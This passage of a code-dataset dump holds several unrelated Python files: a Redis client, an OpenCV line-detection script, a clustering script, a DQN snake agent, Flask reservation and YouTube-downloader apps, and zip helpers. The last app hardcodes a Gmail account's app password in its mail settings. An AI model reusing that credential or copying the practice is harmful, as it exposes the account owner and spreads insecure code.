"e-commerce/CompetitorMonitor/product_spiders/base_spiders/legoamazon.py", "file_name": "legoamazon.py", "file_ext": "py", "file_size_in_byte": 10885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "re.search", "line_number": 50, "usage_type": "call"}, {"api_name": "re.I", "line_number": 50, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.I", "line_number": 58, "usage_type": "attribute"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", 
"line_number": 69, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 70, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 70, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.fuzz.ratio", "line_number": 71, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 77, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 77, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.utils.full_process", "line_number": 78, "usage_type": "call"}, {"api_name": "product_spiders.fuzzywuzzy.utils", "line_number": 78, "usage_type": "name"}, {"api_name": "product_spiders.fuzzywuzzy.fuzz.partial_ratio", "line_number": 79, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 114, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 115, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 147, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 149, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 152, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 154, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 157, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 159, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 162, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 164, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 171, "usage_type": "call"}, {"api_name": "product_spiders.base_spiders.BaseAmazonSpider", "line_number": 199, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 213, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher.connect", "line_number": 217, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher", "line_number": 217, "usage_type": "name"}, {"api_name": "scrapy.signals.spider_closed", "line_number": 217, "usage_type": "attribute"}, {"api_name": "scrapy.signals", "line_number": 217, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path", "line_number": 221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 240, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 241, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 242, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 289, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 320, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 321, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "20955509464", "text": "import redis\nfrom jproperties import Properties\n\nconfigs = Properties()\ndef client():\n r = redis.Redis(\n host=configs.get(\"hostname\").data,\n port=configs.get(\"port\").data,\n ssl=True,\n ssl_cert_reqs=\"required\",\n ssl_ca_certs=\"redis.pem\")\n\n r.set('foo', 'bar')\n value = r.get('foo')\n print(value)\n\n\ndef main():\n with open('config.properties', 'rb') as read_prop:\n configs.load(read_prop)\n\n client()\n \nif __name__==\"__main__\":\n main()\n", "repo_name": "slibonati/redis-enterprise-operator", "sub_path": "redis-client/redis-client.py", "file_name": "redis-client.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "jproperties.Properties", "line_number": 4, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "8374613511", "text": "\n\"\"\"\nhttps://mp.weixin.qq.com/s?__biz=MzA4ODgyMDg0MQ==&mid=100001057&idx=1&sn=ebfd3cf30ffb3a48909bd309fa59f82d&chksm=1025182727529131c5c63d02663bfc517b89c23f4884c4d49334fee27d12947b792e9b36643f#rd\n面对直线,你说霍夫线变换是万能的吗\n\nhttps://www.geeksforgeeks.org/line-detection-python-opencv-houghline-method/?ref=gcse\n\ndoc\\lang\\programming\\opencv summary.md\n\n\"\"\"\n\nimport numpy as np\nimport cv2\n\n\"\"\"\n虽然python 3 使用统一编码解决了中文字符串的问题,但在使用opencv中imread函数读取中文路径图像文件时仍会报错\n此时可借助于numpy 先将文件数据读取出来,然后使用opencv中imdecode函数将其解码成图像数据。此方法对python 2 和3均适用。\n\"\"\"\n\nif __name__ == '__main__':\n\n imgData = np.fromfile('./填空题.png', dtype=np.uint8)\n img_origin = cv2.imdecode(imgData, -1)\n img_rgb = cv2.cvtColor(np.asarray(img_origin), cv2.COLOR_BGRA2RGB)\n\n # 转灰度图\n img_gray = cv2.cvtColor(np.asarray(img_origin), cv2.COLOR_BGR2GRAY) #cv2.COLOR_RGB2BGR\n print(type(img_gray))\n\n w = img_gray.shape[0]\n h = img_gray.shape[1]\n\n # slice 子矩阵,既剪裁图像\n img_crop = img_gray[0:w-30, 0:h-70]\n\n # 二值化\n ret, img_binary = cv2.threshold(img_crop, 92, 255, cv2.THRESH_BINARY_INV)\n # imshow(\"1:二值操作\", binaryImage)\n\n # 开操作(将文字这些密集的“孔洞”给腐蚀掉,仅留下直线)\n rect_kernel = cv2.getStructuringElement(\n cv2.MORPH_RECT, (20, 2)) # 定义了20*2 大小的矩形核\n img_opening = cv2.morphologyEx(img_binary, cv2.MORPH_OPEN, rect_kernel)\n\n # 膨胀加粗\n rect_kernel2 = cv2.getStructuringElement(\n cv2.MORPH_RECT, (3, 3)) # 定义了20*2 大小的矩形核\n img_dilate = cv2.dilate(img_opening, rect_kernel2)\n\n #edges = cv2.Canny(img_dilate,50,150,apertureSize=3)\n\n\n # Apply HoughLinesP method to\n # to directly obtain line end points\n lines = cv2.HoughLinesP(\n img_dilate, # Input edge image\n 1, # Distance resolution in pixels\n np.pi/180, # Angle resolution in radians\n threshold=30, # Min number of votes for valid line\n minLineLength=20, # Min allowed length of line\n maxLineGap=0 # Max allowed gap between line for joining them\n )\n\n #img_color = cv2.cvtColor(img_origin, cv2.COLOR_BGR2RGB)\n\n\n for points in lines:\n # Extracted points nested in the list\n x1,y1,x2,y2=points[0]\n # Draw the lines joing the points\n # On the original image\n #cv2.line(img_origin, (x1,y1),(x2,y2),(0,0,255, 255), 2) # 原图是四通道的BGRA(蓝绿红 + alpha 透明度)\n cv2.line(img_rgb, (x1,y1),(x2,y2),(0,0,255), 2) # 看来无论原图怎么样,cv2 的三个通道顺序永远都是: BGR\n \n\n cv2.imshow(\"origin\", img_origin)\n cv2.imshow(\"croped\", img_crop)\n cv2.imshow(\"binary\", img_binary)\n cv2.imshow(\"opening\", img_opening)\n cv2.imshow(\"dilate\", img_dilate) \n cv2.imshow(\"result\", img_rgb)\n\n cv2.waitKey(0)\n\n\n\n \"\"\"\n\ncpp origin\n\n\n# include \n# include \n\nusing namespace std;\nusing namespace cv;\n\nint main()\n{\n Mat srcImage, dstImage, binaryImage;\n srcImage = imread(\"原图.png\",0); \n imshow(\"原图\", srcImage);\n \n waitKey(0);\n return 0;\n}\n\n //剪裁图片\n Mat roiImage = srcImage(Rect(0, 0, srcImage.cols - 70, srcImage.rows - 30));\n imshow(\"0:抠图操作\", roiImage);\n\n //对图像进行二值化\n threshold(roiImage, binaryImage, 92, 255, THRESH_BINARY_INV );\n imshow(\"1:二值操作\", binaryImage);\n\n\n Mat morhpImage;\n Mat kernel = getStructuringElement(MORPH_RECT, Size(20, 2), Point(-1, -1));//自定义一个核\n morphologyEx(binaryImage, morhpImage, MORPH_OPEN, kernel, Point(-1, -1));//开操作\n imshow(\"2:开操作\", morhpImage);\n\n\n Mat dilateImage;\n kernel = getStructuringElement(MORPH_RECT, Size(3, 3), Point(-1, -1));\n dilate(morhpImage, dilateImage, kernel);\n imshow(\"3:膨胀操作\", dilateImage);\n\n \n vector lines;\n HoughLinesP(dilateImage, lines, 1, CV_PI / 180.0, 30, 20.0, 0);\n dstImage = 
srcImage.clone();\n cvtColor(dstImage, dstImage, COLOR_GRAY2BGR);\n for (size_t t = 0; t < lines.size(); t++) {\n Vec4i ln = lines[t];\n line(dstImage, Point(ln[0], ln[1]), Point(ln[2], ln[3]), Scalar(0, 0, 255), 2, 8, 0);\n }\n imshow(\"4:绘制直线\", dstImage);\n\n \"\"\"\n\n", "repo_name": "dlxj/doc", "sub_path": "lang/programming/python/opencv/面对直线你说霍夫线变换是万能的吗/h.py", "file_name": "h.py", "file_ext": "py", "file_size_in_byte": 4383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.fromfile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGRA2RGB", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "21338398794", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\n#Librería para la normalización de datos \nfrom sklearn.preprocessing import StandardScaler\n# Librería para aplicación de Componentes Princiales\nfrom sklearn.decomposition import PCA\n# Librearías para clusterización y métricas de evaluación\nfrom sklearn.cluster import KMeans,AgglomerativeClustering \nimport pandas as pd\n\n\n# In[5]:\n\n\ndataset_consolidado_canton=pd.read_csv('C:/Users/Byron/Documents/curso_power_bi_sri/data_consolidada_canton.csv')\n\n\n# In[2]:\n\n\ndataset_consolidado_canton\ncampos_numericos=['Suma de Total Compras','Suma de Total Ventas','Suma de Ventas Netas 0%','Suma de Ventas Netas 12%',\n 'Suma de Importaciones','Suma de Exportaciones',\n 'Suma de Compras Rise','Suma de Compras netas 12%','Suma de Compras netas 0%']\n\ncampos_numericos_100K=['Suma de Total Compras','Suma de Total Ventas','Suma de Ventas Netas 0%','Suma de Ventas Netas 12%',\n 'Suma de Importaciones','Suma de Exportaciones',\n 'Suma de Compras Rise','Suma de Compras netas 12%','Suma de Compras netas 0%']\n\n\n# In[3]:\n\n\n# Estandarización de datos numéricos de acuerdo al número de habitantes (x cada 10000 habitantes )\ncontador_campos_numericos=0\nfor campo in campos_numericos: \n dataset_consolidado_canton[campo]=dataset_consolidado_canton[campos_numericos[contador_campos_numericos]]*10000/dataset_consolidado_canton['Suma de Habitantes']\n contador_campos_numericos=contador_campos_numericos+1\n\n\n# In[12]:\n\n\n#Normalización de datos\n# Obtención de dataset únicamente con datos numéricos para aplicar procesos de normalización, PCA y clusterización\ndataset_consolidado_canton_Num=dataset_consolidado_canton.loc[:,campos_numericos ]\nscaler=StandardScaler()\ndataset_normalizado=scaler.fit_transform(dataset_consolidado_canton_Num)\n\n\n# In[14]:\n\n\n# Cálculo de PCA utilizado 2 componentes \npca=PCA(n_components=2)\npca.fit(dataset_normalizado)\npca.transform(dataset_normalizado)\nscores_pca=pca.transform(dataset_normalizado)\n\n\n# In[24]:\n\n\n# CLUSTERIZACION KMEANS\nmetricas_evaluacion_kmeans=list()\ndata_for_scatter=scores_pca\nkmeans = KMeans(n_clusters = 3).fit(data_for_scatter)\n\n#Consolidado cluster\ndataset_consolidado_canton['cluster']=kmeans.labels_\n\n\n# In[25]:\n\n\ndataset_consolidado_canton.to_excel(\"C:/Users/Byron/Documents/curso_power_bi_sri/consolidado_cluster.xlsx\") \n\n", "repo_name": "bodg010715/UNIR_BYRON_DEL_PINO", "sub_path": "proceso_clusterizacion.py", "file_name": "proceso_clusterizacion.py", "file_ext": "py", "file_size_in_byte": 2403, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "30238175104", "text": "import random\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Dict\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional\nfrom torch.optim import Adam\n\nfrom snake.environment.environment import State, Action\nfrom snake.environment.event import Events\nfrom snake.environment.direction import Direction, direction_to_index\nfrom snake.agent.exploration import EpsilonExploration, ExplorationMode\nfrom snake.agent.model import DQN\nfrom snake.agent.replay import ExperienceBatch\nfrom snake.settings import HyperParameters, DEVICE\n\n\nclass Agent(ABC):\n\n @abstractmethod\n def act(self, state: State, **kwargs: Any) -> Action:\n raise NotImplementedError()\n\n\nclass RandomAgent(Agent):\n\n def act(self, state: State, **kwargs: Any) -> Action:\n index = random.randint(0, len(Direction) - 1)\n return Action.from_index(index)\n\n\nclass HumanAgent(Agent):\n\n def act(self, state: State, **kwargs: Any) -> Action:\n events = kwargs.get('events', Events(direction=Direction.UP))\n index = direction_to_index[events.direction]\n return Action.from_index(index)\n\n\nclass NeuralAgent(Agent):\n\n def __init__(self, model: DQN, parameters: HyperParameters) -> None:\n self.policy_network = model.to(DEVICE)\n self.target_network = DQN(model.in_channels, model.out_features).to(DEVICE)\n self.optimizer = Adam(self.policy_network.parameters(), lr=parameters.learning_rate)\n self.exploration = EpsilonExploration(model, parameters)\n self.parameters = parameters\n self.update_target_network()\n\n @torch.no_grad()\n def act(self, state: State, **kwargs: Any) -> Action:\n return self.exploration.sample(state)\n\n @torch.no_grad()\n def compute_targets(self, batch: ExperienceBatch) -> Tensor:\n values = self.policy_network(batch.next_states)\n actions = torch.max(values, dim=1).indices\n\n maximums = self.target_network(batch.next_states)\n maximums = maximums.gather(1, actions.view(-1, 1))\n maximums = maximums.squeeze()\n\n return batch.rewards + (1 - batch.done) * self.parameters.gamma * maximums\n\n def update(self, batch: ExperienceBatch) -> Tensor:\n targets = self.compute_targets(batch)\n\n predictions = self.policy_network(batch.states)\n predictions = predictions.gather(1, batch.actions.view(-1, 1))\n predictions = predictions.squeeze()\n\n # Correct the PER sampling bias\n losses = functional.smooth_l1_loss(predictions, targets, reduction='none')\n loss = torch.mean(batch.weights * losses)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return losses.detach()\n\n def update_target_network(self) -> None:\n self.target_network.load_state_dict(self.policy_network.state_dict())\n\n def train(self) -> None:\n self.policy_network.train()\n self.target_network.train()\n self.exploration.mode = ExplorationMode.TRAIN\n\n def eval(self) -> None:\n self.policy_network.eval()\n self.target_network.eval()\n self.exploration.mode = ExplorationMode.EVAL\n\n def checkpoint(self) -> Dict[str, Any]:\n return {\n 'policy_network_state': self.policy_network.state_dict(),\n 'target_network_state': self.target_network.state_dict(),\n 'optimizer_state': self.optimizer.state_dict()\n }\n", "repo_name": "bartoszzuk/snake", "sub_path": "snake/agent/agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 3417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "abc.ABC", "line_number": 19, "usage_type": "name"}, {"api_name": 
"snake.environment.environment.State", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 22, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 21, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 22, "usage_type": "name"}, {"api_name": "snake.environment.environment.State", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "snake.environment.direction.Direction", "line_number": 29, "usage_type": "argument"}, {"api_name": "snake.environment.environment.Action.from_index", "line_number": 30, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 30, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 28, "usage_type": "name"}, {"api_name": "snake.environment.environment.State", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "snake.environment.event.Events", "line_number": 36, "usage_type": "call"}, {"api_name": "snake.environment.direction.Direction.UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "snake.environment.direction.Direction", "line_number": 36, "usage_type": "name"}, {"api_name": "snake.environment.direction.direction_to_index", "line_number": 37, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action.from_index", "line_number": 38, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 38, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 35, "usage_type": "name"}, {"api_name": "snake.agent.model.DQN", "line_number": 43, "usage_type": "name"}, {"api_name": "snake.settings.HyperParameters", "line_number": 43, "usage_type": "name"}, {"api_name": "snake.settings.DEVICE", "line_number": 44, "usage_type": "argument"}, {"api_name": "snake.settings.DEVICE", "line_number": 45, "usage_type": "argument"}, {"api_name": "snake.agent.model.DQN", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "snake.agent.exploration.EpsilonExploration", "line_number": 47, "usage_type": "call"}, {"api_name": "snake.environment.environment.State", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 51, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 52, "usage_type": "name"}, {"api_name": "snake.agent.replay.ExperienceBatch", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "name"}, {"api_name": "snake.agent.replay.ExperienceBatch", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.smooth_l1_loss", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 66, "usage_type": "name"}, {"api_name": "snake.agent.exploration.ExplorationMode.TRAIN", "line_number": 89, "usage_type": "attribute"}, 
{"api_name": "snake.agent.exploration.ExplorationMode", "line_number": 89, "usage_type": "name"}, {"api_name": "snake.agent.exploration.ExplorationMode.EVAL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "snake.agent.exploration.ExplorationMode", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 96, "usage_type": "name"}]}
+{"seq_id": "38862844853", "text": "from flask import Flask , jsonify, render_template , request \nfrom flask_cors import CORS\nfrom permission import login , logout , logup , isUser , getId ,auth\nfrom db import db_sql\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/',methods=['GET'])\ndef index():\n return ''' Welcome to the SCSTM API '''\n\napp.route('/user/login',methods=['POST'])(login)\n\napp.route('/user/isUser',methods=['POST'])(isUser)\n\napp.route('/user/logout',methods=['POST'])(logout)\n\napp.route('/user/logup',methods=['POST'])(logup)\n\napp.route('/user/getId',methods=['POST'])(getId)\n\n@app.route(\"/api/getReserves\",methods=['POST'])\n@auth.login_required\ndef getReserves():\n username = request.args.get(\"username\")\n\n sql = \"\"\"\n SELECT\n *\n FROM\n reserve\n WHERE\n `userid` = (\n SELECT\n id\n FROM\n user\n WHERE\n `username` = %s\n )\n \"\"\"\n db = db_sql()\n res = db.read_sql(sql,value=(username))\n print(res)\n if res:\n return jsonify({'code':20000,'message': '成功','data':res})\n else:\n return jsonify({'code':20000,'message': '没有预约','data':[]})\n\n@app.route(\"/api/setReserves\",methods=['POST'])\n@auth.login_required\ndef setReserves():\n data = request.get_json(silent=True)\n if not data:\n return jsonify({'code':10000,'message': '数据错误','data':''})\n \n userid = data[\"userid\"]\n time = data[\"time\"]\n person = data[\"person\"]\n part = data[\"part\"]\n desp = data[\"desp\"]\n \n sql = \"\"\"\n INSERT INTO `reserve` (`userid` ,`time`, `person`, `part`, `desp`) VALUES (%s,%s, %s, %s, %s);\n \"\"\"\n db = db_sql()\n db.insert_sql(sql,value=(userid,time,person,part,desp))\n\n return jsonify({'code':20000,'message': '成功','data':\"\"})\n\n@app.route(\"/api/cancelReserves\",methods=['POST'])\n@auth.login_required\ndef cancelReserves():\n id = request.args.get(\"id\")\n\n sql = \"\"\"\n DELETE FROM `reserve` WHERE `id` = %s\n \"\"\"\n db = db_sql()\n res = db.insert_sql(sql,value=(id))\n\n return jsonify({'code':20000,'message': '成功','data':\"\"})\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=9000)\n\n\n ", "repo_name": "dkymore/SCSTM_AppAndServer", "sub_path": "Src/Server/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "permission.login", "line_number": 14, "usage_type": "argument"}, {"api_name": "permission.isUser", "line_number": 16, "usage_type": "argument"}, {"api_name": "permission.logout", "line_number": 18, "usage_type": "argument"}, {"api_name": "permission.logup", "line_number": 20, "usage_type": "argument"}, {"api_name": "permission.getId", "line_number": 22, "usage_type": "argument"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "db.db_sql", "line_number": 44, "usage_type": "call"}, {"api_name": "db.read_sql", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 50, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 25, "usage_type": "attribute"}, {"api_name": "permission.auth", 
"line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "db.db_sql", "line_number": 68, "usage_type": "call"}, {"api_name": "db.insert_sql", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 53, "usage_type": "attribute"}, {"api_name": "permission.auth", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "db.db_sql", "line_number": 81, "usage_type": "call"}, {"api_name": "db.insert_sql", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 84, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 74, "usage_type": "attribute"}, {"api_name": "permission.auth", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "69992549207", "text": "import os\nimport zipfile\nimport re\n\nfrom shutil import make_archive\n\ndef unzip_specific_file(zip_file_name, *extract_file_name, directory=\"/tmp\"):\n with zipfile.ZipFile(zip_file_name, 'r') as zip_ref:\n for file_name in extract_file_name:\n zip_ref.extract(file_name, directory)\n\n\ndef unzip_specific_folder(zip_file_name, *extract_folder_name, directory=\"/tmp\"):\n with zipfile.ZipFile(zip_file_name) as archive:\n for folder_name in extract_folder_name:\n names_foo = [i for i in archive.namelist() if i.startswith(folder_name)]\n for file in names_foo:\n archive.extract(file, directory)\n\n\ndef match_file_from_name_pattern(zip_file_name, pattern):\n with zipfile.ZipFile(zip_file_name) as archive:\n for info in archive.infolist():\n if re.match(pattern, info.filename):\n return info.filename\n return None\n\ndef zip_folder(source_folder_path, output_zip_filename):\n return make_archive(output_zip_filename, \"zip\", source_folder_path)\n", "repo_name": "aravind-viswanathan/h2oai-mlflow-flavors", "sub_path": "h2o_mlflow_flavors/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "zipfile.ZipFile", "line_number": 8, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 14, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.match", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.make_archive", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "38103541249", "text": "from __future__ import unicode_literals\nimport phonenumbers\nfrom flask import Flask, render_template, request, flash, redirect, url_for, session, abort, jsonify, send_file\nimport urllib.request\nfrom forms import Track\nfrom pytube import YouTube\nfrom io import BytesIO\nfrom uuid import uuid4\nimport random, string\nfrom downloader import URLOpenResult, Downloader\nfrom datetime import datetime\nfrom flask_mail import Mail, Message\nfrom bs4 import BeautifulSoup\nfrom phonenumbers import geocoder, timezone, carrier\nimport datetime\nimport os, secrets\nimport time\nimport json\nimport pickle\nimport requests\nimport yt_dlp as youtube_dl\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n\nmail = Mail(app)\n \n\n\n\n\n\napp.config[\"DEBUG\"] = True\n\n\napp.config[\"SQLALCHEMY_POOL_RECYCLE\"] = 299\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = 'SECRET_KEY'\napp.config['UPLOADED_PHOTOS_DEST'] = os.path.join(basedir, 'static/images')\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'olamicreas@gmail.com'\napp.config['MAIL_PASSWORD'] = 'rwqdpqnsosdahvjf'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_DEFAULT_SENDER'] = 'olamicreas@gmail.com'\nmail = Mail(app)\n\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef t():\n \n form = Track(request.form)\n d = request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('tube.html', title='Youtube Video Downloader')\n@app.route('/privacy')\ndef privacy():\n return render_template('privacy.html', 